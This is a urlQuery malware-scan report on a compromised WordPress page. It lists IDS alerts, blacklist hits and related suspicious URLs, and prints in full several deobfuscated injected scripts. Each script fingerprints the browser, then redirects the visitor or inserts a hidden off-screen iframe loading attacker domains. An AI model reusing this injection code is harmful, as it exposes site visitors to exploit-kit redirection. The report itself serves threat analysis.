Overview

URL academicounsel.com/homim/zekifohe.html
IP132.148.50.1
ASN
Location United States
Report completed2018-05-31 18:19:46 CEST
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Severity Source IP Destination IP Alert
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:54 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:54 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:54 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:52 CEST 1  132.148.50.1 Client IP ET CURRENT_EVENTS Possible Evil Redirector Leading to EK June 10 2015
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET INFO JJEncode Encoded Script
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2018-05-31 2 academicounsel.com/wp-includes/js/swfobject.js?ver=2.2-20120417 Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js (...) Malware
2018-05-31 2 academicounsel.com/wp-includes/js/comment-reply.min.js?ver=4.0.5 Malware
2018-05-31 2 academicounsel.com/homim/min.js Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/bootstrap/js/bootstrap (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.mobile.custo (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.mobilemenu.j (...) Malware
2018-05-31 2 academicounsel.com/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1. (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.magnific-pop (...) Malware
2018-05-31 2 academicounsel.com/wp-content/plugins/contact-form-7/includes/js/scripts.js (...) Malware
2018-05-31 2 academicounsel.com/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquer (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jplayer.playlist.mi (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.debouncedres (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.ba-resize.mi (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.isotope.js?v (...) Malware
2018-05-31 2 academicounsel.com/wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/ (...) Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 132.148.50.1

Date UQ / IDS / BL URL IP
2018-06-13 16:47:30 +0200
0 - 2 - 2 zoelowney.com/Service-Inv/ 132.148.50.1
2018-06-11 17:37:04 +0200
0 - 2 - 2 silkscatering.com.au/IRS-Accounts-Transcipts- (...) 132.148.50.1
2018-06-08 12:49:45 +0200
0 - 0 - 2 222bulbs.com/ 132.148.50.1
2018-06-05 06:46:03 +0200
0 - 2 - 2 silkscatering.com.au/UPS-Factures-07/5/ 132.148.50.1
2018-06-04 21:27:15 +0200
0 - 2 - 2 silkscatering.com.au/Invoice-June/01/2018/ 132.148.50.1
2018-05-31 23:11:57 +0200
0 - 0 - 2 jerseydrunks.com/category/just-posts/function (...) 132.148.50.1
2018-05-29 22:03:49 +0200
0 - 2 - 0 silkscatering.com.au/ups.com/WebTracking/ENC- (...) 132.148.50.1
2018-05-29 22:02:41 +0200
0 - 2 - 0 silkscatering.com.au/ups.com/WebTracking/ENC- (...) 132.148.50.1
2018-05-26 23:05:37 +0200
0 - 0 - 10 www.binarywar.com/2009/11/troubleshooting-ema (...) 132.148.50.1
2018-05-19 23:02:50 +0200
0 - 0 - 1 crafthouse.co.nz/www.paypal-entrydata.com/sig (...) 132.148.50.1

Last 10 reports on ASN:

Date UQ / IDS / BL URL IP
2018-06-19 04:35:39 +0200
0 - 0 - 1 https://www.siteripcollection.com/siterip/2 139.59.173.101
2018-06-19 04:33:48 +0200
1 - 1 - 0 bloquearprograma.org/ 149.56.15.24
2018-06-19 04:30:11 +0200
0 - 1 - 0 thaiharurestaurant.com/ 198.54.117.200
2018-06-19 04:28:40 +0200
0 - 0 - 7 ikebukuro-gstyle.com 52.42.59.29
2018-06-19 04:24:52 +0200
2 - 0 - 8 arcanevault.com/toon-tumblers-teentitans-308.html 108.179.242.137
2018-06-19 04:17:35 +0200
0 - 0 - 0 https://www.territoires-rh.fr/forum/kunena-to (...) 164.132.235.17
2018-06-19 04:15:53 +0200
0 - 0 - 0 t.edm.sgic.com.au 52.63.55.158
2018-06-19 04:15:37 +0200
0 - 0 - 0 https://www.territoires-rh.fr/forum/kunena-to (...) 164.132.235.17
2018-06-19 04:13:55 +0200
0 - 0 - 0 https://2go-danmurphys.club.cutestat.com 103.111.79.79
2018-06-19 04:12:43 +0200
0 - 4 - 13 bhfrr.lu94.top/a/910229.html 202.168.151.42

Last 2 reports on domain: academicounsel.com

Date UQ / IDS / BL URL IP
2017-11-02 08:54:21 +0100
0 - 10 - 5 academicounsel.com/homim/sunilorov.html 132.148.50.1
2017-11-01 01:23:58 +0100
0 - 10 - 6 academicounsel.com/homim/5043.html 132.148.50.1


JavaScript

Executed Scripts (14)


Executed Evals (8)

#1 JavaScript::Eval (size: 6242, repeated: 1) - SHA256: 529cff59fb15bbca4af0b3bea1bb6a8972156e747b1093b6a253537cfe2cb1cc

                                        var CXiQxGhFSFqiWndHAnoXOVpdoUNPKNNDf = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(CXiQxGhFSFqiWndHAnoXOVpdoUNPKNNDf);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var DocOSJMpMyYnxBsGzEoQWeBhqbwKSRebeMSVFuQ = (rWbFsQYwWiCwloeLdlyOwCpQPlaGNQDx() && VgEbGgWeIYgZYpgFYkurJzeGUrvgvluI());
            var wvFfKHCPyLIerudSEGfgQlWvdGccIECfgzGfpNOf = !DocOSJMpMyYnxBsGzEoQWeBhqbwKSRebeMSVFuQ && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ryJlLRdVXNZocruWhFNtqNtYQoynYrbk = -1;
            var ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW = "http://dgdsgweewtew545435.tk";
            if (ThtHLZWzhLrHgIeEbiXrDJDyUEHXXTFPblNlBOkrr() && ryJlLRdVXNZocruWhFNtqNtYQoynYrbk == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW)
                } else {
                    window.location = ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW;
                    document.location = ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW
                }
            } else {
                if ((DocOSJMpMyYnxBsGzEoQWeBhqbwKSRebeMSVFuQ && !wvFfKHCPyLIerudSEGfgQlWvdGccIECfgzGfpNOf && !ThtHLZWzhLrHgIeEbiXrDJDyUEHXXTFPblNlBOkrr())) {
                    var aYwXpVyARFCQtrMvCGBDiBlKHRthjAOkAYor = "<div style=\"position:absolute;left:-2066px;\"><iframe width=\"17px\" src=\"" + ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW + "\" height=\"17px\"></iframe></div>";
                    var GexiloQspgOwGLAmoYGgWUqPByjASKZ = document.getElementsByTagName("div");
                    if (GexiloQspgOwGLAmoYGgWUqPByjASKZ.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + aYwXpVyARFCQtrMvCGBDiBlKHRthjAOkAYor
                    } else {
                        var dl_name = GexiloQspgOwGLAmoYGgWUqPByjASKZ.length;
                        var utNRDRoscuLlSENzKFGxVyQYnkgSYJa = Math.floor((dl_name / 2));
                        GexiloQspgOwGLAmoYGgWUqPByjASKZ[utNRDRoscuLlSENzKFGxVyQYnkgSYJa].innerHTML = GexiloQspgOwGLAmoYGgWUqPByjASKZ[utNRDRoscuLlSENzKFGxVyQYnkgSYJa].innerHTML + aYwXpVyARFCQtrMvCGBDiBlKHRthjAOkAYor
                    }
                }
            }
        }
        YQUWSVeWFIZsNMrXMJIxUaHmEjIMLExovAUyXQFdR()
    }
}, 100);

function YQUWSVeWFIZsNMrXMJIxUaHmEjIMLExovAUyXQFdR() {
    var nidikpeoIMMvxzjXsrxJOJHOydKswIYGte = "none";
    if (nidikpeoIMMvxzjXsrxJOJHOydKswIYGte != "none") {
        var jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG = document.getElementById(nidikpeoIMMvxzjXsrxJOJHOydKswIYGte);
        if (typeof jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG != undefined && jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG != null) {
            jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG.outerHTML = "";
            delete jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG
        }
    }
};

function VgEbGgWeIYgZYpgFYkurJzeGUrvgvluI() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && rWbFsQYwWiCwloeLdlyOwCpQPlaGNQDx()) {
        return true
    } else {
        return false
    }
}

function rWbFsQYwWiCwloeLdlyOwCpQPlaGNQDx() {
    var xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu = window.navigator.userAgent;
    var bCEAWZXAuMvGfYqNVmLlfeVrAFNpwKqFzlMAhA = xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf("MSIE ");
    if (bCEAWZXAuMvGfYqNVmLlfeVrAFNpwKqFzlMAhA > 0) {
        return parseInt(xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.substring(bCEAWZXAuMvGfYqNVmLlfeVrAFNpwKqFzlMAhA + 5, xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf(".", bCEAWZXAuMvGfYqNVmLlfeVrAFNpwKqFzlMAhA)), 10)
    }
    var UasaTBZrVNfUumOCeRQOfbnuQgnOdPASDWRLq = xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf("Trident/");
    if (UasaTBZrVNfUumOCeRQOfbnuQgnOdPASDWRLq > 0) {
        var uovpNSzOgsuGOVHMhjIAjsyhJGmLZUpj = xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf("rv:");
        return parseInt(xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.substring(uovpNSzOgsuGOVHMhjIAjsyhJGmLZUpj + 3, xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf(".", uovpNSzOgsuGOVHMhjIAjsyhJGmLZUpj)), 10)
    }
    var FpraNoBCvftAxbHtcxWePiCEvxWepNl = xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf("Edge/");
    if (FpraNoBCvftAxbHtcxWePiCEvxWepNl > 0) {
        return parseInt(xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.substring(FpraNoBCvftAxbHtcxWePiCEvxWepNl + 5, xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf(".", FpraNoBCvftAxbHtcxWePiCEvxWepNl)), 10)
    }
    return false
}

function ThtHLZWzhLrHgIeEbiXrDJDyUEHXXTFPblNlBOkrr() {
    var YnIwenFmJZvvYAbunwrAPEvLzNGJMYJuc = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(YnIwenFmJZvvYAbunwrAPEvLzNGJMYJuc) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(YnIwenFmJZvvYAbunwrAPEvLzNGJMYJuc.substr(0, 4))) {
        return true
    }
    return false
}
                                    

#2 JavaScript::Eval (size: 6255, repeated: 1) - SHA256: 24742f6f3220f4f2bb41d0c8b3c0c1cb2c4cac5f3b2f723e15a8bad407d4f0bb

                                        var HOqPJMsJGkSbtwiXWVvLZVcAQgsLkZg = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(HOqPJMsJGkSbtwiXWVvLZVcAQgsLkZg);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var KIXNiuvwkghZJNjkPSxGyTmFZDUDxbzqVcRXtzEz = (ocGusZEMSgVFrPnMRvLszNCRHAqiXNzMJYmvm() && aapIzKHnZbCOwmeORIZEukgsdmzKTuicayDnCl());
            var mCxXUcRgnRwWqPttQpiAoPLcILGLzJX = !KIXNiuvwkghZJNjkPSxGyTmFZDUDxbzqVcRXtzEz && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var XrqruDcGpnKODCtKzUyjTSPIXxihzxqZKWWKASs = -1;
            var KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ = "http://trahnytbushakiry.ga";
            if (HSqKhYYRzyvVxKEkLTJsqyMdxEmkKQnutkrE() && XrqruDcGpnKODCtKzUyjTSPIXxihzxqZKWWKASs == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ)
                } else {
                    window.location = KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ;
                    document.location = KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ
                }
            } else {
                if ((KIXNiuvwkghZJNjkPSxGyTmFZDUDxbzqVcRXtzEz && !mCxXUcRgnRwWqPttQpiAoPLcILGLzJX && !HSqKhYYRzyvVxKEkLTJsqyMdxEmkKQnutkrE())) {
                    var onJnXciSLeAJsRtyXmMmfQqiaCuuSbavyIYnfVJj = "<div style=\"position:absolute;left:-1765px;\"><iframe width=\"16px\" src=\"" + KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ + "\" height=\"16px\"></iframe></div>";
                    var OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr = document.getElementsByTagName("div");
                    if (OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + onJnXciSLeAJsRtyXmMmfQqiaCuuSbavyIYnfVJj
                    } else {
                        var dl_name = OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr.length;
                        var nOAOtFpVGCHmtfKvZzUKWFREXhvwRyQv = Math.floor((dl_name / 2));
                        OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr[nOAOtFpVGCHmtfKvZzUKWFREXhvwRyQv].innerHTML = OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr[nOAOtFpVGCHmtfKvZzUKWFREXhvwRyQv].innerHTML + onJnXciSLeAJsRtyXmMmfQqiaCuuSbavyIYnfVJj
                    }
                }
            }
        }
        YuxBSdzOtdomGMuRPVckkvZTJjASNAqaw()
    }
}, 100);

function YuxBSdzOtdomGMuRPVckkvZTJjASNAqaw() {
    var NQEYkiOCvzpAEtJcgpNHXaLWRZhxnbsEJlrj = "none";
    if (NQEYkiOCvzpAEtJcgpNHXaLWRZhxnbsEJlrj != "none") {
        var PBHAtqlSrAPGgPglOMzdcjfrRukcUlr = document.getElementById(NQEYkiOCvzpAEtJcgpNHXaLWRZhxnbsEJlrj);
        if (typeof PBHAtqlSrAPGgPglOMzdcjfrRukcUlr != undefined && PBHAtqlSrAPGgPglOMzdcjfrRukcUlr != null) {
            PBHAtqlSrAPGgPglOMzdcjfrRukcUlr.outerHTML = "";
            delete PBHAtqlSrAPGgPglOMzdcjfrRukcUlr
        }
    }
};

function aapIzKHnZbCOwmeORIZEukgsdmzKTuicayDnCl() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && ocGusZEMSgVFrPnMRvLszNCRHAqiXNzMJYmvm()) {
        return true
    } else {
        return false
    }
}

function ocGusZEMSgVFrPnMRvLszNCRHAqiXNzMJYmvm() {
    var NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz = window.navigator.userAgent;
    var dKEcTIsWeBZSiaaLdvaDdycEwJwaLEhmHyHLBs = NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf("MSIE ");
    if (dKEcTIsWeBZSiaaLdvaDdycEwJwaLEhmHyHLBs > 0) {
        return parseInt(NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.substring(dKEcTIsWeBZSiaaLdvaDdycEwJwaLEhmHyHLBs + 5, NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf(".", dKEcTIsWeBZSiaaLdvaDdycEwJwaLEhmHyHLBs)), 10)
    }
    var pMLccWewFnBAYKtsHeYAHSxUsGAAQBrbdJZXUuMd = NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf("Trident/");
    if (pMLccWewFnBAYKtsHeYAHSxUsGAAQBrbdJZXUuMd > 0) {
        var StDFHFHlwKRKZkXpqksMXxvBJSXjBEWqkUwzPRe = NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf("rv:");
        return parseInt(NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.substring(StDFHFHlwKRKZkXpqksMXxvBJSXjBEWqkUwzPRe + 3, NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf(".", StDFHFHlwKRKZkXpqksMXxvBJSXjBEWqkUwzPRe)), 10)
    }
    var GqnJzMUUCcstPVHQwqHIpfMGaHRIZeYfCMkwRF = NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf("Edge/");
    if (GqnJzMUUCcstPVHQwqHIpfMGaHRIZeYfCMkwRF > 0) {
        return parseInt(NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.substring(GqnJzMUUCcstPVHQwqHIpfMGaHRIZeYfCMkwRF + 5, NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf(".", GqnJzMUUCcstPVHQwqHIpfMGaHRIZeYfCMkwRF)), 10)
    }
    return false
}

function HSqKhYYRzyvVxKEkLTJsqyMdxEmkKQnutkrE() {
    var bvYTYMBMEfsqbKZbXRDBWLRnROSPgtSGxOaZPUmC = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(bvYTYMBMEfsqbKZbXRDBWLRnROSPgtSGxOaZPUmC) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(bvYTYMBMEfsqbKZbXRDBWLRnROSPgtSGxOaZPUmC.substr(0, 4))) {
        return true
    }
    return false
}
                                    

#3 JavaScript::Eval (size: 6314, repeated: 1) - SHA256: fec0f02c3294317f6af1d4ac62866ee2149d0110832a4bcb341069f25fb66405

                                        var JBHcCllOLmzHcanQtaVtUyOioaMZwTIxcvmUy = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(JBHcCllOLmzHcanQtaVtUyOioaMZwTIxcvmUy);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var AOxBEcEpPTAkNlZydiaiUkCaVhePKDx = (etQHxQfAsZsDKJfdroKwFGLKxNmROvXFMMWXLUV() && jkEtVMjHCfEbUwnAyLrVOQdguQXJsOGKyvFHIGjIS());
            var hOjsiwdItCVmevMoFHpvvccfJSuDbxxckzxDq = !AOxBEcEpPTAkNlZydiaiUkCaVhePKDx && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var MNWIVpVpYiamfSqEJaAndioEPkQtpmbE = -1;
            var vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON = "http://dgdsgweewtew545435.tk";
            if (SZALaqqEYCwlvsdYGLVLWtCqvxFyoIsYaEYE() && MNWIVpVpYiamfSqEJaAndioEPkQtpmbE == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON)
                } else {
                    window.location = vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON;
                    document.location = vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON
                }
            } else {
                if ((AOxBEcEpPTAkNlZydiaiUkCaVhePKDx && !hOjsiwdItCVmevMoFHpvvccfJSuDbxxckzxDq && !SZALaqqEYCwlvsdYGLVLWtCqvxFyoIsYaEYE())) {
                    var pLqCARWqoNBIyyFMuVksNWrfwrfHWnvUSNREsP = "<div style=\"position:absolute;left:-3674px;\"><iframe width=\"15px\" src=\"" + vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON + "\" height=\"15px\"></iframe></div>";
                    var lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg = document.getElementsByTagName("div");
                    if (lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + pLqCARWqoNBIyyFMuVksNWrfwrfHWnvUSNREsP
                    } else {
                        var dl_name = lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg.length;
                        var QHwXeSZhJgkFoaZfgcHcYMKkxgGGTOWusc = Math.floor((dl_name / 2));
                        lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg[QHwXeSZhJgkFoaZfgcHcYMKkxgGGTOWusc].innerHTML = lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg[QHwXeSZhJgkFoaZfgcHcYMKkxgGGTOWusc].innerHTML + pLqCARWqoNBIyyFMuVksNWrfwrfHWnvUSNREsP
                    }
                }
            }
        }
